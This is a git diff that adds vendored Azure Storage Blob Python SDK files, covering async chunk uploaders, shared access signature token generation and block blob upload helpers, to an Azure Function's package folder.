self.progress_hook(self.progress_total, self.total_size) + + async def _upload_chunk(self, chunk_offset, chunk_data): + raise NotImplementedError("Must be implemented by child class.") + + async def _upload_chunk_with_progress(self, chunk_offset, chunk_data): + range_id = await self._upload_chunk(chunk_offset, chunk_data) + await self._update_progress(len(chunk_data)) + return range_id + + def get_substream_blocks(self): + assert self.chunk_size is not None + lock = self.stream_lock + blob_length = self.total_size + + if blob_length is None: + blob_length = get_length(self.stream) + if blob_length is None: + raise ValueError("Unable to determine content length of upload data.") + + blocks = int(ceil(blob_length / (self.chunk_size * 1.0))) + last_block_size = self.chunk_size if blob_length % self.chunk_size == 0 else blob_length % self.chunk_size + + for i in range(blocks): + index = i * self.chunk_size + length = last_block_size if i == blocks - 1 else self.chunk_size + yield index, SubStream(self.stream, index, length, lock) + + async def process_substream_block(self, block_data): + return await self._upload_substream_block_with_progress(block_data[0], block_data[1]) + + async def _upload_substream_block(self, index, block_stream): + raise NotImplementedError("Must be implemented by child class.") + + async def _upload_substream_block_with_progress(self, index, block_stream): + range_id = await self._upload_substream_block(index, block_stream) + await self._update_progress(len(block_stream)) + return range_id + + def set_response_properties(self, resp): + self.etag = resp.etag + self.last_modified = resp.last_modified + + +class BlockBlobChunkUploader(_ChunkUploader): + + def __init__(self, *args, **kwargs): + kwargs.pop('modified_access_conditions', None) + super(BlockBlobChunkUploader, self).__init__(*args, **kwargs) + self.current_length = None + + async def _upload_chunk(self, chunk_offset, chunk_data): + # TODO: This is incorrect, but works with recording. + index = '{0:032d}'.format(chunk_offset) + block_id = encode_base64(url_quote(encode_base64(index))) + await self.service.stage_block( + block_id, + len(chunk_data), + body=chunk_data, + data_stream_total=self.total_size, + upload_stream_current=self.progress_total, + **self.request_options) + return index, block_id + + async def _upload_substream_block(self, index, block_stream): + try: + block_id = 'BlockId{}'.format("%05d" % (index/self.chunk_size)) + await self.service.stage_block( + block_id, + len(block_stream), + block_stream, + data_stream_total=self.total_size, + upload_stream_current=self.progress_total, + **self.request_options) + finally: + block_stream.close() + return block_id + + +class PageBlobChunkUploader(_ChunkUploader): # pylint: disable=abstract-method + + def _is_chunk_empty(self, chunk_data): + # read until non-zero byte is encountered + # if reached the end without returning, then chunk_data is all 0's + for each_byte in chunk_data: + if each_byte not in [0, b'\x00']: + return False + return True + + async def _upload_chunk(self, chunk_offset, chunk_data): + # avoid uploading the empty pages + if not self._is_chunk_empty(chunk_data): + chunk_end = chunk_offset + len(chunk_data) - 1 + content_range = 'bytes={0}-{1}'.format(chunk_offset, chunk_end) + computed_md5 = None + self.response_headers = await self.service.upload_pages( + body=chunk_data, + content_length=len(chunk_data), + transactional_content_md5=computed_md5, + range=content_range, + cls=return_response_headers, + data_stream_total=self.total_size, + upload_stream_current=self.progress_total, + **self.request_options) + + if not self.parallel and self.request_options.get('modified_access_conditions'): + self.request_options['modified_access_conditions'].if_match = self.response_headers['etag'] + + async def _upload_substream_block(self, index, block_stream): + pass + + +class AppendBlobChunkUploader(_ChunkUploader): # pylint: disable=abstract-method + + def __init__(self, *args, **kwargs): + super(AppendBlobChunkUploader, self).__init__(*args, **kwargs) + self.current_length = None + + async def _upload_chunk(self, chunk_offset, chunk_data): + if self.current_length is None: + self.response_headers = await self.service.append_block( + body=chunk_data, + content_length=len(chunk_data), + cls=return_response_headers, + data_stream_total=self.total_size, + upload_stream_current=self.progress_total, + **self.request_options) + self.current_length = int(self.response_headers['blob_append_offset']) + else: + self.request_options['append_position_access_conditions'].append_position = \ + self.current_length + chunk_offset + self.response_headers = await self.service.append_block( + body=chunk_data, + content_length=len(chunk_data), + cls=return_response_headers, + data_stream_total=self.total_size, + upload_stream_current=self.progress_total, + **self.request_options) + + async def _upload_substream_block(self, index, block_stream): + pass + + +class DataLakeFileChunkUploader(_ChunkUploader): # pylint: disable=abstract-method + + async def _upload_chunk(self, chunk_offset, chunk_data): + self.response_headers = await self.service.append_data( + body=chunk_data, + position=chunk_offset, + content_length=len(chunk_data), + cls=return_response_headers, + data_stream_total=self.total_size, + upload_stream_current=self.progress_total, + **self.request_options + ) + + if not self.parallel and self.request_options.get('modified_access_conditions'): + self.request_options['modified_access_conditions'].if_match = self.response_headers['etag'] + + async def _upload_substream_block(self, index, block_stream): + try: + await self.service.append_data( + body=block_stream, + position=index, + content_length=len(block_stream), + cls=return_response_headers, + data_stream_total=self.total_size, + upload_stream_current=self.progress_total, + **self.request_options + ) + finally: + block_stream.close() + + +class FileChunkUploader(_ChunkUploader): # pylint: disable=abstract-method + + async def _upload_chunk(self, chunk_offset, chunk_data): + length = len(chunk_data) + chunk_end = chunk_offset + length - 1 + response = await self.service.upload_range( + chunk_data, + chunk_offset, + length, + data_stream_total=self.total_size, + upload_stream_current=self.progress_total, + **self.request_options + ) + range_id = 'bytes={0}-{1}'.format(chunk_offset, chunk_end) + return range_id, response + + # TODO: Implement this method. + async def _upload_substream_block(self, index, block_stream): + pass diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared_access_signature.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared_access_signature.py new file mode 100644 index 0000000..ae569ee --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared_access_signature.py @@ -0,0 +1,609 @@ +# ------------------------------------------------------------------------- +# Copyright (c) Microsoft Corporation. All rights reserved. +# Licensed under the MIT License. See License.txt in the project root for +# license information. +# -------------------------------------------------------------------------- + +from typing import ( # pylint: disable=unused-import + Union, Optional, Any, TYPE_CHECKING +) + +from ._shared import sign_string, url_quote +from ._shared.constants import X_MS_VERSION +from ._shared.models import Services, UserDelegationKey +from ._shared.shared_access_signature import SharedAccessSignature, _SharedAccessHelper, \ + QueryStringConstants + +if TYPE_CHECKING: + from datetime import datetime + from ..blob import ( + ResourceTypes, + AccountSasPermissions, + ContainerSasPermissions, + BlobSasPermissions + ) + + +class BlobQueryStringConstants(object): + SIGNED_TIMESTAMP = 'snapshot' + + +class BlobSharedAccessSignature(SharedAccessSignature): + ''' + Provides a factory for creating blob and container access + signature tokens with a common account name and account key. Users can either + use the factory or can construct the appropriate service and use the + generate_*_shared_access_signature method directly. + ''' + + def __init__(self, account_name, account_key=None, user_delegation_key=None): + ''' + :param str account_name: + The storage account name used to generate the shared access signatures. + :param str account_key: + The access key to generate the shares access signatures. + :param ~azure.storage.blob.models.UserDelegationKey user_delegation_key: + Instead of an account key, the user could pass in a user delegation key. + A user delegation key can be obtained from the service by authenticating with an AAD identity; + this can be accomplished by calling get_user_delegation_key on any Blob service object. + ''' + super(BlobSharedAccessSignature, self).__init__(account_name, account_key, x_ms_version=X_MS_VERSION) + self.user_delegation_key = user_delegation_key + + def generate_blob(self, container_name, blob_name, snapshot=None, version_id=None, permission=None, + expiry=None, start=None, policy_id=None, ip=None, protocol=None, + cache_control=None, content_disposition=None, + content_encoding=None, content_language=None, + content_type=None, **kwargs): + ''' + Generates a shared access signature for the blob or one of its snapshots. + Use the returned signature with the sas_token parameter of any BlobService. + + :param str container_name: + Name of container. + :param str blob_name: + Name of blob. + :param str snapshot: + The snapshot parameter is an opaque DateTime value that, + when present, specifies the blob snapshot to grant permission. + :param permission: + The permissions associated with the shared access signature. The + user is restricted to operations allowed by the permissions. + Permissions must be ordered racwdxytmei. + Required unless an id is given referencing a stored access policy + which contains this field. This field must be omitted if it has been + specified in an associated stored access policy. + :type permission: str or BlobSasPermissions + :param expiry: + The time at which the shared access signature becomes invalid. + Required unless an id is given referencing a stored access policy + which contains this field. This field must be omitted if it has + been specified in an associated stored access policy. Azure will always + convert values to UTC. If a date is passed in without timezone info, it + is assumed to be UTC. + :type expiry: datetime or str + :param start: + The time at which the shared access signature becomes valid. If + omitted, start time for this call is assumed to be the time when the + storage service receives the request. Azure will always convert values + to UTC. If a date is passed in without timezone info, it is assumed to + be UTC. + :type start: datetime or str + :param str policy_id: + A unique value up to 64 characters in length that correlates to a + stored access policy. To create a stored access policy, use + set_blob_service_properties. + :param str ip: + Specifies an IP address or a range of IP addresses from which to accept requests. + If the IP address from which the request originates does not match the IP address + or address range specified on the SAS token, the request is not authenticated. + For example, specifying sip=168.1.5.65 or sip=168.1.5.60-168.1.5.70 on the SAS + restricts the request to those IP addresses. + :param str protocol: + Specifies the protocol permitted for a request made. The default value + is https,http. See :class:`~azure.storage.common.models.Protocol` for possible values. + :param str cache_control: + Response header value for Cache-Control when resource is accessed + using this shared access signature. + :param str content_disposition: + Response header value for Content-Disposition when resource is accessed + using this shared access signature. + :param str content_encoding: + Response header value for Content-Encoding when resource is accessed + using this shared access signature. + :param str content_language: + Response header value for Content-Language when resource is accessed + using this shared access signature. + :param str content_type: + Response header value for Content-Type when resource is accessed + using this shared access signature. + ''' + resource_path = container_name + '/' + blob_name + + sas = _BlobSharedAccessHelper() + sas.add_base(permission, expiry, start, ip, protocol, self.x_ms_version) + sas.add_id(policy_id) + + resource = 'bs' if snapshot else 'b' + resource = 'bv' if version_id else resource + resource = 'd' if kwargs.pop("is_directory", None) else resource + sas.add_resource(resource) + + sas.add_timestamp(snapshot or version_id) + sas.add_override_response_headers(cache_control, content_disposition, + content_encoding, content_language, + content_type) + sas.add_encryption_scope(**kwargs) + sas.add_info_for_hns_account(**kwargs) + sas.add_resource_signature(self.account_name, self.account_key, resource_path, + user_delegation_key=self.user_delegation_key) + + return sas.get_token() + + def generate_container(self, container_name, permission=None, expiry=None, + start=None, policy_id=None, ip=None, protocol=None, + cache_control=None, content_disposition=None, + content_encoding=None, content_language=None, + content_type=None, **kwargs): + ''' + Generates a shared access signature for the container. + Use the returned signature with the sas_token parameter of any BlobService. + + :param str container_name: + Name of container. + :param permission: + The permissions associated with the shared access signature. The + user is restricted to operations allowed by the permissions. + Permissions must be ordered racwdxyltfmei. + Required unless an id is given referencing a stored access policy + which contains this field. This field must be omitted if it has been + specified in an associated stored access policy. + :type permission: str or ContainerSasPermissions + :param expiry: + The time at which the shared access signature becomes invalid. + Required unless an id is given referencing a stored access policy + which contains this field. This field must be omitted if it has + been specified in an associated stored access policy. Azure will always + convert values to UTC. If a date is passed in without timezone info, it + is assumed to be UTC. + :type expiry: datetime or str + :param start: + The time at which the shared access signature becomes valid. If + omitted, start time for this call is assumed to be the time when the + storage service receives the request. Azure will always convert values + to UTC. If a date is passed in without timezone info, it is assumed to + be UTC. + :type start: datetime or str + :param str policy_id: + A unique value up to 64 characters in length that correlates to a + stored access policy. To create a stored access policy, use + set_blob_service_properties. + :param str ip: + Specifies an IP address or a range of IP addresses from which to accept requests. + If the IP address from which the request originates does not match the IP address + or address range specified on the SAS token, the request is not authenticated. + For example, specifying sip=168.1.5.65 or sip=168.1.5.60-168.1.5.70 on the SAS + restricts the request to those IP addresses. + :param str protocol: + Specifies the protocol permitted for a request made. The default value + is https,http. See :class:`~azure.storage.common.models.Protocol` for possible values. + :param str cache_control: + Response header value for Cache-Control when resource is accessed + using this shared access signature. + :param str content_disposition: + Response header value for Content-Disposition when resource is accessed + using this shared access signature. + :param str content_encoding: + Response header value for Content-Encoding when resource is accessed + using this shared access signature. + :param str content_language: + Response header value for Content-Language when resource is accessed + using this shared access signature. + :param str content_type: + Response header value for Content-Type when resource is accessed + using this shared access signature. + ''' + sas = _BlobSharedAccessHelper() + sas.add_base(permission, expiry, start, ip, protocol, self.x_ms_version) + sas.add_id(policy_id) + sas.add_resource('c') + sas.add_override_response_headers(cache_control, content_disposition, + content_encoding, content_language, + content_type) + sas.add_encryption_scope(**kwargs) + sas.add_info_for_hns_account(**kwargs) + sas.add_resource_signature(self.account_name, self.account_key, container_name, + user_delegation_key=self.user_delegation_key) + return sas.get_token() + + +class _BlobSharedAccessHelper(_SharedAccessHelper): + + def add_timestamp(self, timestamp): + self._add_query(BlobQueryStringConstants.SIGNED_TIMESTAMP, timestamp) + + def add_info_for_hns_account(self, **kwargs): + self._add_query(QueryStringConstants.SIGNED_DIRECTORY_DEPTH, kwargs.pop('sdd', None)) + self._add_query(QueryStringConstants.SIGNED_AUTHORIZED_OID, kwargs.pop('preauthorized_agent_object_id', None)) + self._add_query(QueryStringConstants.SIGNED_UNAUTHORIZED_OID, kwargs.pop('agent_object_id', None)) + self._add_query(QueryStringConstants.SIGNED_CORRELATION_ID, kwargs.pop('correlation_id', None)) + + def get_value_to_append(self, query): + return_value = self.query_dict.get(query) or '' + return return_value + '\n' + + def add_resource_signature(self, account_name, account_key, path, user_delegation_key=None): + # pylint: disable = no-member + if path[0] != '/': + path = '/' + path + + canonicalized_resource = '/blob/' + account_name + path + '\n' + + # Form the string to sign from shared_access_policy and canonicalized + # resource. The order of values is important. + string_to_sign = \ + (self.get_value_to_append(QueryStringConstants.SIGNED_PERMISSION) + + self.get_value_to_append(QueryStringConstants.SIGNED_START) + + self.get_value_to_append(QueryStringConstants.SIGNED_EXPIRY) + + canonicalized_resource) + + if user_delegation_key is not None: + self._add_query(QueryStringConstants.SIGNED_OID, user_delegation_key.signed_oid) + self._add_query(QueryStringConstants.SIGNED_TID, user_delegation_key.signed_tid) + self._add_query(QueryStringConstants.SIGNED_KEY_START, user_delegation_key.signed_start) + self._add_query(QueryStringConstants.SIGNED_KEY_EXPIRY, user_delegation_key.signed_expiry) + self._add_query(QueryStringConstants.SIGNED_KEY_SERVICE, user_delegation_key.signed_service) + self._add_query(QueryStringConstants.SIGNED_KEY_VERSION, user_delegation_key.signed_version) + + string_to_sign += \ + (self.get_value_to_append(QueryStringConstants.SIGNED_OID) + + self.get_value_to_append(QueryStringConstants.SIGNED_TID) + + self.get_value_to_append(QueryStringConstants.SIGNED_KEY_START) + + self.get_value_to_append(QueryStringConstants.SIGNED_KEY_EXPIRY) + + self.get_value_to_append(QueryStringConstants.SIGNED_KEY_SERVICE) + + self.get_value_to_append(QueryStringConstants.SIGNED_KEY_VERSION) + + self.get_value_to_append(QueryStringConstants.SIGNED_AUTHORIZED_OID) + + self.get_value_to_append(QueryStringConstants.SIGNED_UNAUTHORIZED_OID) + + self.get_value_to_append(QueryStringConstants.SIGNED_CORRELATION_ID)) + else: + string_to_sign += self.get_value_to_append(QueryStringConstants.SIGNED_IDENTIFIER) + + string_to_sign += \ + (self.get_value_to_append(QueryStringConstants.SIGNED_IP) + + self.get_value_to_append(QueryStringConstants.SIGNED_PROTOCOL) + + self.get_value_to_append(QueryStringConstants.SIGNED_VERSION) + + self.get_value_to_append(QueryStringConstants.SIGNED_RESOURCE) + + self.get_value_to_append(BlobQueryStringConstants.SIGNED_TIMESTAMP) + + self.get_value_to_append(QueryStringConstants.SIGNED_ENCRYPTION_SCOPE) + + self.get_value_to_append(QueryStringConstants.SIGNED_CACHE_CONTROL) + + self.get_value_to_append(QueryStringConstants.SIGNED_CONTENT_DISPOSITION) + + self.get_value_to_append(QueryStringConstants.SIGNED_CONTENT_ENCODING) + + self.get_value_to_append(QueryStringConstants.SIGNED_CONTENT_LANGUAGE) + + self.get_value_to_append(QueryStringConstants.SIGNED_CONTENT_TYPE)) + + # remove the trailing newline + if string_to_sign[-1] == '\n': + string_to_sign = string_to_sign[:-1] + + self._add_query(QueryStringConstants.SIGNED_SIGNATURE, + sign_string(account_key if user_delegation_key is None else user_delegation_key.value, + string_to_sign)) + + def get_token(self): + # a conscious decision was made to exclude the timestamp in the generated token + # this is to avoid having two snapshot ids in the query parameters when the user appends the snapshot timestamp + exclude = [BlobQueryStringConstants.SIGNED_TIMESTAMP] + return '&'.join(['{0}={1}'.format(n, url_quote(v)) + for n, v in self.query_dict.items() if v is not None and n not in exclude]) + + +def generate_account_sas( + account_name, # type: str + account_key, # type: str + resource_types, # type: Union[ResourceTypes, str] + permission, # type: Union[AccountSasPermissions, str] + expiry, # type: Optional[Union[datetime, str]] + start=None, # type: Optional[Union[datetime, str]] + ip=None, # type: Optional[str] + **kwargs # type: Any + ): # type: (...) -> str + """Generates a shared access signature for the blob service. + + Use the returned signature with the credential parameter of any BlobServiceClient, + ContainerClient or BlobClient. + + :param str account_name: + The storage account name used to generate the shared access signature. + :param str account_key: + The account key, also called shared key or access key, to generate the shared access signature. + :param resource_types: + Specifies the resource types that are accessible with the account SAS. + :type resource_types: str or ~azure.storage.blob.ResourceTypes + :param permission: + The permissions associated with the shared access signature. The + user is restricted to operations allowed by the permissions. + Required unless an id is given referencing a stored access policy + which contains this field. This field must be omitted if it has been + specified in an associated stored access policy. + :type permission: str or ~azure.storage.blob.AccountSasPermissions + :param expiry: + The time at which the shared access signature becomes invalid. + Required unless an id is given referencing a stored access policy + which contains this field. This field must be omitted if it has + been specified in an associated stored access policy. Azure will always + convert values to UTC. If a date is passed in without timezone info, it + is assumed to be UTC. + :type expiry: ~datetime.datetime or str + :param start: + The time at which the shared access signature becomes valid. If + omitted, start time for this call is assumed to be the time when the + storage service receives the request. Azure will always convert values + to UTC. If a date is passed in without timezone info, it is assumed to + be UTC. + :type start: ~datetime.datetime or str + :param str ip: + Specifies an IP address or a range of IP addresses from which to accept requests. + If the IP address from which the request originates does not match the IP address + or address range specified on the SAS token, the request is not authenticated. + For example, specifying ip=168.1.5.65 or ip=168.1.5.60-168.1.5.70 on the SAS + restricts the request to those IP addresses. + :keyword str protocol: + Specifies the protocol permitted for a request made. The default value is https. + :keyword str encryption_scope: + Specifies the encryption scope for a request made so that all write operations will be service encrypted. + :return: A Shared Access Signature (sas) token. + :rtype: str + + .. admonition:: Example: + + .. literalinclude:: ../samples/blob_samples_authentication.py + :start-after: [START create_sas_token] + :end-before: [END create_sas_token] + :language: python + :dedent: 8 + :caption: Generating a shared access signature. + """ + sas = SharedAccessSignature(account_name, account_key) + return sas.generate_account( + services=Services(blob=True), + resource_types=resource_types, + permission=permission, + expiry=expiry, + start=start, + ip=ip, + **kwargs + ) # type: ignore + + +def generate_container_sas( + account_name, # type: str + container_name, # type: str + account_key=None, # type: Optional[str] + user_delegation_key=None, # type: Optional[UserDelegationKey] + permission=None, # type: Optional[Union[ContainerSasPermissions, str]] + expiry=None, # type: Optional[Union[datetime, str]] + start=None, # type: Optional[Union[datetime, str]] + policy_id=None, # type: Optional[str] + ip=None, # type: Optional[str] + **kwargs # type: Any + ): + # type: (...) -> Any + """Generates a shared access signature for a container. + + Use the returned signature with the credential parameter of any BlobServiceClient, + ContainerClient or BlobClient. + + :param str account_name: + The storage account name used to generate the shared access signature. + :param str container_name: + The name of the container. + :param str account_key: + The account key, also called shared key or access key, to generate the shared access signature. + Either `account_key` or `user_delegation_key` must be specified. + :param ~azure.storage.blob.UserDelegationKey user_delegation_key: + Instead of an account shared key, the user could pass in a user delegation key. + A user delegation key can be obtained from the service by authenticating with an AAD identity; + this can be accomplished by calling :func:`~azure.storage.blob.BlobServiceClient.get_user_delegation_key`. + When present, the SAS is signed with the user delegation key instead. + :param permission: + The permissions associated with the shared access signature. The + user is restricted to operations allowed by the permissions. + Permissions must be ordered racwdxyltfmei. + Required unless an id is given referencing a stored access policy + which contains this field. This field must be omitted if it has been + specified in an associated stored access policy. + :type permission: str or ~azure.storage.blob.ContainerSasPermissions + :param expiry: + The time at which the shared access signature becomes invalid. + Required unless an id is given referencing a stored access policy + which contains this field. This field must be omitted if it has + been specified in an associated stored access policy. Azure will always + convert values to UTC. If a date is passed in without timezone info, it + is assumed to be UTC. + :type expiry: ~datetime.datetime or str + :param start: + The time at which the shared access signature becomes valid. If + omitted, start time for this call is assumed to be the time when the + storage service receives the request. Azure will always convert values + to UTC. If a date is passed in without timezone info, it is assumed to + be UTC. + :type start: ~datetime.datetime or str + :param str policy_id: + A unique value up to 64 characters in length that correlates to a + stored access policy. To create a stored access policy, use + :func:`~azure.storage.blob.ContainerClient.set_container_access_policy`. + :param str ip: + Specifies an IP address or a range of IP addresses from which to accept requests. + If the IP address from which the request originates does not match the IP address + or address range specified on the SAS token, the request is not authenticated. + For example, specifying ip=168.1.5.65 or ip=168.1.5.60-168.1.5.70 on the SAS + restricts the request to those IP addresses. + :keyword str protocol: + Specifies the protocol permitted for a request made. The default value is https. + :keyword str cache_control: + Response header value for Cache-Control when resource is accessed + using this shared access signature. + :keyword str content_disposition: + Response header value for Content-Disposition when resource is accessed + using this shared access signature. + :keyword str content_encoding: + Response header value for Content-Encoding when resource is accessed + using this shared access signature. + :keyword str content_language: + Response header value for Content-Language when resource is accessed + using this shared access signature. + :keyword str content_type: + Response header value for Content-Type when resource is accessed + using this shared access signature. + :keyword str encryption_scope: + Specifies the encryption scope for a request made so that all write operations will be service encrypted. + :return: A Shared Access Signature (sas) token. + :rtype: str + + .. admonition:: Example: + + .. literalinclude:: ../samples/blob_samples_containers.py + :start-after: [START generate_sas_token] + :end-before: [END generate_sas_token] + :language: python + :dedent: 12 + :caption: Generating a sas token. + """ + if not user_delegation_key and not account_key: + raise ValueError("Either user_delegation_key or account_key must be provided.") + if isinstance(account_key, UserDelegationKey): + user_delegation_key = account_key + if user_delegation_key: + sas = BlobSharedAccessSignature(account_name, user_delegation_key=user_delegation_key) + else: + sas = BlobSharedAccessSignature(account_name, account_key=account_key) + return sas.generate_container( + container_name, + permission=permission, + expiry=expiry, + start=start, + policy_id=policy_id, + ip=ip, + **kwargs + ) + + +def generate_blob_sas( + account_name, # type: str + container_name, # type: str + blob_name, # type: str + snapshot=None, # type: Optional[str] + account_key=None, # type: Optional[str] + user_delegation_key=None, # type: Optional[UserDelegationKey] + permission=None, # type: Optional[Union[BlobSasPermissions, str]] + expiry=None, # type: Optional[Union[datetime, str]] + start=None, # type: Optional[Union[datetime, str]] + policy_id=None, # type: Optional[str] + ip=None, # type: Optional[str] + **kwargs # type: Any + ): + # type: (...) -> Any + """Generates a shared access signature for a blob. + + Use the returned signature with the credential parameter of any BlobServiceClient, + ContainerClient or BlobClient. + + :param str account_name: + The storage account name used to generate the shared access signature. + :param str container_name: + The name of the container. + :param str blob_name: + The name of the blob. + :param str snapshot: + An optional blob snapshot ID. + :param str account_key: + The account key, also called shared key or access key, to generate the shared access signature. + Either `account_key` or `user_delegation_key` must be specified. + :param ~azure.storage.blob.UserDelegationKey user_delegation_key: + Instead of an account shared key, the user could pass in a user delegation key. + A user delegation key can be obtained from the service by authenticating with an AAD identity; + this can be accomplished by calling :func:`~azure.storage.blob.BlobServiceClient.get_user_delegation_key`. + When present, the SAS is signed with the user delegation key instead. + :param permission: + The permissions associated with the shared access signature. The + user is restricted to operations allowed by the permissions. + Permissions must be ordered racwdxytmei. + Required unless an id is given referencing a stored access policy + which contains this field. This field must be omitted if it has been + specified in an associated stored access policy. + :type permission: str or ~azure.storage.blob.BlobSasPermissions + :param expiry: + The time at which the shared access signature becomes invalid. + Required unless an id is given referencing a stored access policy + which contains this field. This field must be omitted if it has + been specified in an associated stored access policy. Azure will always + convert values to UTC. If a date is passed in without timezone info, it + is assumed to be UTC. + :type expiry: ~datetime.datetime or str + :param start: + The time at which the shared access signature becomes valid. If + omitted, start time for this call is assumed to be the time when the + storage service receives the request. Azure will always convert values + to UTC. If a date is passed in without timezone info, it is assumed to + be UTC. + :type start: ~datetime.datetime or str + :param str policy_id: + A unique value up to 64 characters in length that correlates to a + stored access policy. To create a stored access policy, use + :func:`~azure.storage.blob.ContainerClient.set_container_access_policy()`. + :param str ip: + Specifies an IP address or a range of IP addresses from which to accept requests. + If the IP address from which the request originates does not match the IP address + or address range specified on the SAS token, the request is not authenticated. + For example, specifying ip=168.1.5.65 or ip=168.1.5.60-168.1.5.70 on the SAS + restricts the request to those IP addresses. + :keyword str version_id: + An optional blob version ID. This parameter is only for versioning enabled account + + .. versionadded:: 12.4.0 + This keyword argument was introduced in API version '2019-12-12'. + :keyword str protocol: + Specifies the protocol permitted for a request made. The default value is https. + :keyword str cache_control: + Response header value for Cache-Control when resource is accessed + using this shared access signature. + :keyword str content_disposition: + Response header value for Content-Disposition when resource is accessed + using this shared access signature. + :keyword str content_encoding: + Response header value for Content-Encoding when resource is accessed + using this shared access signature. + :keyword str content_language: + Response header value for Content-Language when resource is accessed + using this shared access signature. + :keyword str content_type: + Response header value for Content-Type when resource is accessed + using this shared access signature. + :keyword str encryption_scope: + Specifies the encryption scope for a request made so that all write operations will be service encrypted. + :return: A Shared Access Signature (sas) token. + :rtype: str + """ + if not user_delegation_key and not account_key: + raise ValueError("Either user_delegation_key or account_key must be provided.") + if isinstance(account_key, UserDelegationKey): + user_delegation_key = account_key + version_id = kwargs.pop('version_id', None) + if version_id and snapshot: + raise ValueError("snapshot and version_id cannot be set at the same time.") + if user_delegation_key: + sas = BlobSharedAccessSignature(account_name, user_delegation_key=user_delegation_key) + else: + sas = BlobSharedAccessSignature(account_name, account_key=account_key) + return sas.generate_blob( + container_name, + blob_name, + snapshot=snapshot, + version_id=version_id, + permission=permission, + expiry=expiry, + start=start, + policy_id=policy_id, + ip=ip, + **kwargs + ) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_upload_helpers.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_upload_helpers.py new file mode 100644 index 0000000..08c1a1b --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_upload_helpers.py @@ -0,0 +1,320 @@ +# ------------------------------------------------------------------------- +# Copyright (c) Microsoft Corporation. All rights reserved. +# Licensed under the MIT License. See License.txt in the project root for +# license information. +# -------------------------------------------------------------------------- +# pylint: disable=no-self-use + +from io import SEEK_SET, UnsupportedOperation +from typing import Optional, Union, Any, TypeVar, TYPE_CHECKING # pylint: disable=unused-import + +import six +from azure.core.exceptions import ResourceExistsError, ResourceModifiedError, HttpResponseError + +from ._shared.response_handlers import ( + process_storage_error, + return_response_headers) +from ._shared.models import StorageErrorCode +from ._shared.uploads import ( + upload_data_chunks, + upload_substream_blocks, + BlockBlobChunkUploader, + PageBlobChunkUploader, + AppendBlobChunkUploader) +from ._shared.encryption import generate_blob_encryption_data, encrypt_blob +from ._generated.models import ( + BlockLookupList, + AppendPositionAccessConditions, + ModifiedAccessConditions, +) + +if TYPE_CHECKING: + from datetime import datetime # pylint: disable=unused-import + BlobLeaseClient = TypeVar("BlobLeaseClient") + +_LARGE_BLOB_UPLOAD_MAX_READ_BUFFER_SIZE = 4 * 1024 * 1024 +_ERROR_VALUE_SHOULD_BE_SEEKABLE_STREAM = '{0} should be a seekable file-like/io.IOBase type stream object.' + + +def _convert_mod_error(error): + message = error.message.replace( + "The condition specified using HTTP conditional header(s) is not met.", + "The specified blob already exists.") + message = message.replace("ConditionNotMet", "BlobAlreadyExists") + overwrite_error = ResourceExistsError( + message=message, + response=error.response, + error=error) + overwrite_error.error_code = StorageErrorCode.blob_already_exists + raise overwrite_error + + +def _any_conditions(modified_access_conditions=None, **kwargs): # pylint: disable=unused-argument + return any([ + modified_access_conditions.if_modified_since, + modified_access_conditions.if_unmodified_since, + modified_access_conditions.if_none_match, + modified_access_conditions.if_match + ]) + + +def upload_block_blob( # pylint: disable=too-many-locals + client=None, + data=None, + stream=None, + length=None, + overwrite=None, + headers=None, + validate_content=None, + max_concurrency=None, + blob_settings=None, + encryption_options=None, + **kwargs): + try: + if not overwrite and not _any_conditions(**kwargs): + kwargs['modified_access_conditions'].if_none_match = '*' + adjusted_count = length + if (encryption_options.get('key') is not None) and (adjusted_count is not None): + adjusted_count += (16 - (length % 16)) + blob_headers = kwargs.pop('blob_headers', None) + tier = kwargs.pop('standard_blob_tier', None) + blob_tags_string = kwargs.pop('blob_tags_string', None) + + immutability_policy = kwargs.pop('immutability_policy', None) + immutability_policy_expiry = None if immutability_policy is None else immutability_policy.expiry_time + immutability_policy_mode = None if immutability_policy is None else immutability_policy.policy_mode + legal_hold = kwargs.pop('legal_hold', None) + progress_hook = kwargs.pop('progress_hook', None) + + # Do single put if the size is smaller than or equal config.max_single_put_size + if adjusted_count is not None and (adjusted_count <= blob_settings.max_single_put_size): + try: + data = data.read(length) + if not isinstance(data, six.binary_type): + raise TypeError('Blob data should be of type bytes.') + except AttributeError: + pass + if encryption_options.get('key'): + encryption_data, data = encrypt_blob(data, encryption_options['key']) + headers['x-ms-meta-encryptiondata'] = encryption_data + + response = client.upload( + body=data, + content_length=adjusted_count, + blob_http_headers=blob_headers, + headers=headers, + cls=return_response_headers, + validate_content=validate_content, + data_stream_total=adjusted_count, + upload_stream_current=0, + tier=tier.value if tier else None, + blob_tags_string=blob_tags_string, + immutability_policy_expiry=immutability_policy_expiry, + immutability_policy_mode=immutability_policy_mode, + legal_hold=legal_hold, + **kwargs) + + if progress_hook: + progress_hook(adjusted_count, adjusted_count) + + return response + + use_original_upload_path = blob_settings.use_byte_buffer or \ + validate_content or encryption_options.get('required') or \ + blob_settings.max_block_size < blob_settings.min_large_block_upload_threshold or \ + hasattr(stream, 'seekable') and not stream.seekable() or \ + not hasattr(stream, 'seek') or not hasattr(stream, 'tell') + + if use_original_upload_path: + if encryption_options.get('key'): + cek, iv, encryption_data = generate_blob_encryption_data(encryption_options['key']) + headers['x-ms-meta-encryptiondata'] = encryption_data + encryption_options['cek'] = cek + encryption_options['vector'] = iv + block_ids = upload_data_chunks( + service=client, + uploader_class=BlockBlobChunkUploader, + total_size=length, + chunk_size=blob_settings.max_block_size, + max_concurrency=max_concurrency, + stream=stream, + validate_content=validate_content, + encryption_options=encryption_options, + progress_hook=progress_hook, + headers=headers, + **kwargs + ) + else: + block_ids = upload_substream_blocks( + service=client, + uploader_class=BlockBlobChunkUploader, + total_size=length, + chunk_size=blob_settings.max_block_size, + max_concurrency=max_concurrency, + stream=stream, + validate_content=validate_content, + progress_hook=progress_hook, + headers=headers, + **kwargs + ) + + block_lookup = BlockLookupList(committed=[], uncommitted=[], latest=[]) + block_lookup.latest = block_ids + return client.commit_block_list( + block_lookup, + 